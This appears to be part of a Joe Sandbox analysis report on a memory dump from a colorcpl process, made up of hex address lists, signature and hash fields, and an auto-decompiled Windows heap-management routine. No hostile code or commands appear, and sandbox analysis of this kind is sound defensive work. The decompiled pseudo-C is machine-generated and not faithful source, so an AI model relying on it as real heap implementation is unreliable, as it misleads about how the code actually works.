                                                                                                0x06ed46c5
                                                                                                0x06ed46a3
                                                                                                0x06ed46b8
                                                                                                0x06ed46bd
                                                                                                0x06ed46cb
                                                                                                0x06ed46d4
                                                                                                0x06ed4677
                                                                                                0x06ed4677
                                                                                                0x06ed4679
                                                                                                0x06ed467c
                                                                                                0x06ed468a
                                                                                                0x06ed4690
                                                                                                0x06ed4690
                                                                                                0x06ed47f1
                                                                                                0x06ed47f1
                                                                                                0x06ed47f1
                                                                                                0x00000000
                                                                                                0x06ed47f1
                                                                                                0x06ed4536
                                                                                                0x06ed4539
                                                                                                0x06ed453c
                                                                                                0x06ed4636
                                                                                                0x06ed463c
                                                                                                0x06ed4640
                                                                                                0x06ed465f
                                                                                                0x06ed4664
                                                                                                0x06ed4642
                                                                                                0x06ed4657
                                                                                                0x06ed465c
                                                                                                0x06ed4670
                                                                                                0x00000000
                                                                                                0x06ed4542
                                                                                                0x06ed4542
                                                                                                0x06ed4546
                                                                                                0x06ed4548
                                                                                                0x06ed454b
                                                                                                0x06ed4555
                                                                                                0x06ed455b
                                                                                                0x06ed455b
                                                                                                0x06ed455b
                                                                                                0x06ed455d
                                                                                                0x06ed455d
                                                                                                0x06ed455d
                                                                                                0x00000000
                                                                                                0x06ed455d
                                                                                                0x06ed453c
                                                                                                0x06ed4579
                                                                                                0x06ed457c
                                                                                                0x06ed4587
                                                                                                0x06ed4589
                                                                                                0x06ed4591
                                                                                                0x06ed4592
                                                                                                0x06ed4597
                                                                                                0x06ed4598
                                                                                                0x06ed45a1
                                                                                                0x06ed45ab
                                                                                                0x06ed45ab
                                                                                                0x06ed45a1
                                                                                                0x06ed45ae
                                                                                                0x06ed45b4
                                                                                                0x06ed45b9
                                                                                                0x06ed45bd
                                                                                                0x06ed4759
                                                                                                0x06ed4759
                                                                                                0x06ed475f
                                                                                                0x06ed4761
                                                                                                0x06ed4763
                                                                                                0x06ed4765
                                                                                                0x06ed4768
                                                                                                0x06ed476b
                                                                                                0x06ed476d
                                                                                                0x06ed479c
                                                                                                0x06ed479c
                                                                                                0x06ed479f
                                                                                                0x06ed47a2
                                                                                                0x06ed47a4
                                                                                                0x06ed4830
                                                                                                0x06ed4833
                                                                                                0x06ed4879
                                                                                                0x06ed487d
                                                                                                0x06ed48f1
                                                                                                0x06ed48f3
                                                                                                0x06ed48f3
                                                                                                0x00000000
                                                                                                0x06ed48f3
                                                                                                0x06ed487f
                                                                                                0x06ed4885
                                                                                                0x06ed4887
                                                                                                0x06ed48a8
                                                                                                0x06ed48a8
                                                                                                0x06ed48ae
                                                                                                0x06ed48b0
                                                                                                0x06ed48dc
                                                                                                0x06ed48dc
                                                                                                0x06ed48dc
                                                                                                0x06ed48dc
                                                                                                0x06ed48ec
                                                                                                0x00000000
                                                                                                0x06ed48ec
                                                                                                0x06ed48b2
                                                                                                0x06ed48bc
                                                                                                0x06ed48be
                                                                                                0x06ed48c1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed48c3
                                                                                                0x06ed48c3
                                                                                                0x06ed48c6
                                                                                                0x06ed48c9
                                                                                                0x06ed48cc
                                                                                                0x06ed48d1
                                                                                                0x06ed48d4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed48d6
                                                                                                0x06ed48d7
                                                                                                0x06ed48da
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed48da
                                                                                                0x06ed494f
                                                                                                0x06ed4955
                                                                                                0x06ed4959
                                                                                                0x06ed4978
                                                                                                0x06ed497d
                                                                                                0x06ed495b
                                                                                                0x06ed4970
                                                                                                0x06ed4975
                                                                                                0x06ed4986
                                                                                                0x06ed4987
                                                                                                0x06ed498a
                                                                                                0x06ed498d
                                                                                                0x06ed4997
                                                                                                0x06ed47ef
                                                                                                0x06ed47ef
                                                                                                0x06ed47ef
                                                                                                0x00000000
                                                                                                0x06ed47ef
                                                                                                0x06ed4890
                                                                                                0x06ed4890
                                                                                                0x06ed4891
                                                                                                0x06ed4891
                                                                                                0x06ed4894
                                                                                                0x06ed4897
                                                                                                0x06ed489d
                                                                                                0x06ed48a0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed48a2
                                                                                                0x06ed48a3
                                                                                                0x06ed48a6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed48a6
                                                                                                0x06ed48fb
                                                                                                0x06ed4901
                                                                                                0x06ed4905
                                                                                                0x06ed4924
                                                                                                0x06ed4929
                                                                                                0x06ed4907
                                                                                                0x06ed491c
                                                                                                0x06ed4921
                                                                                                0x06ed492f
                                                                                                0x06ed4935
                                                                                                0x06ed4936
                                                                                                0x06ed4939
                                                                                                0x06ed4942
                                                                                                0x00000000
                                                                                                0x06ed4947
                                                                                                0x06ed4835
                                                                                                0x06ed483b
                                                                                                0x06ed483f
                                                                                                0x06ed485e
                                                                                                0x06ed4863
                                                                                                0x06ed4841
                                                                                                0x06ed4856
                                                                                                0x06ed485b
                                                                                                0x06ed4869
                                                                                                0x06ed486c
                                                                                                0x06ed486f
                                                                                                0x06ed47e7
                                                                                                0x06ed47e7
                                                                                                0x00000000
                                                                                                0x06ed47ec
                                                                                                0x06ed47aa
                                                                                                0x06ed47b0
                                                                                                0x06ed47b4
                                                                                                0x06ed47d3
                                                                                                0x06ed47d8
                                                                                                0x06ed47b6
                                                                                                0x06ed47cb
                                                                                                0x06ed47d0
                                                                                                0x06ed47de
                                                                                                0x06ed47df
                                                                                                0x06ed47e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed476f
                                                                                                0x06ed476f
                                                                                                0x06ed4778
                                                                                                0x06ed4785
                                                                                                0x06ed4787
                                                                                                0x06ed478c
                                                                                                0x06ed478e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4790
                                                                                                0x06ed4792
                                                                                                0x06ed4794
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4796
                                                                                                0x06ed4799
                                                                                                0x00000000
                                                                                                0x06ed4799
                                                                                                0x00000000
                                                                                                0x06ed45c3
                                                                                                0x06ed45c3
                                                                                                0x06ed45c7
                                                                                                0x06ed45c7
                                                                                                0x06ed45ca
                                                                                                0x06ed45cf
                                                                                                0x06ed45d3
                                                                                                0x06ed45df
                                                                                                0x06ed45e4
                                                                                                0x06ed45e6
                                                                                                0x06ed45e8
                                                                                                0x06ed45ed
                                                                                                0x06ed45ed
                                                                                                0x06ed45f2
                                                                                                0x06ed45f2
                                                                                                0x06ed45f7
                                                                                                0x06ed45fc
                                                                                                0x06ed4602
                                                                                                0x06ed4606
                                                                                                0x06ed4609
                                                                                                0x06ed460f
                                                                                                0x06ed46de
                                                                                                0x06ed46e3
                                                                                                0x06ed46e5
                                                                                                0x06ed46ec
                                                                                                0x06ed46ee
                                                                                                0x06ed46f6
                                                                                                0x06ed46f6
                                                                                                0x06ed46f6
                                                                                                0x06ed46f6
                                                                                                0x06ed46ec
                                                                                                0x06ed4615
                                                                                                0x06ed4615
                                                                                                0x06ed461d
                                                                                                0x06ed462e
                                                                                                0x06ed462e
                                                                                                0x06ed461d
                                                                                                0x06ed460f
                                                                                                0x06ed4609
                                                                                                0x06ed46fd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4710
                                                                                                0x06ed471a
                                                                                                0x06ed4720
                                                                                                0x06ed4720
                                                                                                0x06ed4722
                                                                                                0x06ed472c
                                                                                                0x00000000
                                                                                                0x06ed472e
                                                                                                0x06ed472e
                                                                                                0x00000000
                                                                                                0x06ed472e
                                                                                                0x06ed472c
                                                                                                0x06ed4738
                                                                                                0x06ed473c
                                                                                                0x06ed474b
                                                                                                0x06ed4751
                                                                                                0x06ed4751
                                                                                                0x00000000
                                                                                                0x06ed473c
                                                                                                0x06ed48f4
                                                                                                0x06ed48f4
                                                                                                0x00000000
                                                                                                0x06ed48f4

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                • API String ID: 0-1357697941
                                                                                                • Opcode ID: f7468bb6c5891df43fdb10b89ef0bc5a6875c0cd5b92090c3b65d2d921455a34
                                                                                                • Instruction ID: 187c521f2817981fa3aa7dfd26740c7f55f4b7c3f7263d04f575b0683e5b5e5f
                                                                                                • Opcode Fuzzy Hash: f7468bb6c5891df43fdb10b89ef0bc5a6875c0cd5b92090c3b65d2d921455a34
                                                                                                • Instruction Fuzzy Hash: 10F13631A10785EFCBA5CF68C484BAAB7F5FF19308F059019E4569B6C0C730E98ACB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3A309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 72%
                                                                                                			E06E3A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x6f08a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E06E3A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E06E3DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E06E19373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E06E1A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x6f08748 - 1;
						if( *0x6f08748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E06E1B150();
								} else {
									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E06E1B150();
								__eflags =  *0x6f07bc8;
								if( *0x6f07bc8 == 0) {
									__eflags = 1;
									E06ED2073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x6f08748 - 1;
							if( *0x6f08748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E06E4174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E06E37D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E06ED14FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E06E19373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E06E19819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x6f08748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E06E1B150();
											} else {
												E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E06E1B150();
											_pop(_t491);
											__eflags =  *0x6f07bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E06ED2073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E06EDA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E06E3A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E06E37D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E06E37D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E06ED1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E06E37D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E06E37D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x6f08748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E06E1B150();
							} else {
								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E06E1B150();
							__eflags =  *0x6f07bc8;
							if( *0x6f07bc8 == 0) {
								__eflags = 0;
								E06ED2073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x6f08748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E06E1B150();
												} else {
													E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E06E1B150();
												__eflags =  *0x6f07bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E06ED2073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E06EDA80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E06E3A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E06E3B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E06E3A830(_t553, _v64, _v24);
								_t286 = E06E37D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E06E37D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E06ED1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E06E37D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E06E37D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E06ED1411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E06E4174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E06E3B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E06E37D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E06ED14FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E06E399BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E06E3A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E06E4ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                                                0x06e3a309
                                                                                                0x06e3a316
                                                                                                0x06e3a319
                                                                                                0x06e3a31d
                                                                                                0x06e3a32d
                                                                                                0x06e3a331
                                                                                                0x06e81e0d
                                                                                                0x06e81e10
                                                                                                0x06e3a3cb
                                                                                                0x06e3a3cb
                                                                                                0x06e3a3bd
                                                                                                0x06e3a3c3
                                                                                                0x06e3a3c3
                                                                                                0x06e3a33a
                                                                                                0x06e81e17
                                                                                                0x06e81e1b
                                                                                                0x06e81e1d
                                                                                                0x06e81e2f
                                                                                                0x06e81e34
                                                                                                0x06e81e36
                                                                                                0x06e81e3c
                                                                                                0x06e81e3c
                                                                                                0x06e81e3c
                                                                                                0x06e81e3c
                                                                                                0x06e81e36
                                                                                                0x06e81e42
                                                                                                0x06e81e45
                                                                                                0x06e81e47
                                                                                                0x06e3a3f8
                                                                                                0x06e3a3f8
                                                                                                0x06e3a3fb
                                                                                                0x06e3a3fd
                                                                                                0x06e81e50
                                                                                                0x06e3a403
                                                                                                0x06e3a411
                                                                                                0x06e3a411
                                                                                                0x06e3a411
                                                                                                0x06e3a41e
                                                                                                0x06e3a420
                                                                                                0x06e3a424
                                                                                                0x06e3a427
                                                                                                0x06e3a7c9
                                                                                                0x06e3a7cd
                                                                                                0x06e3a7d2
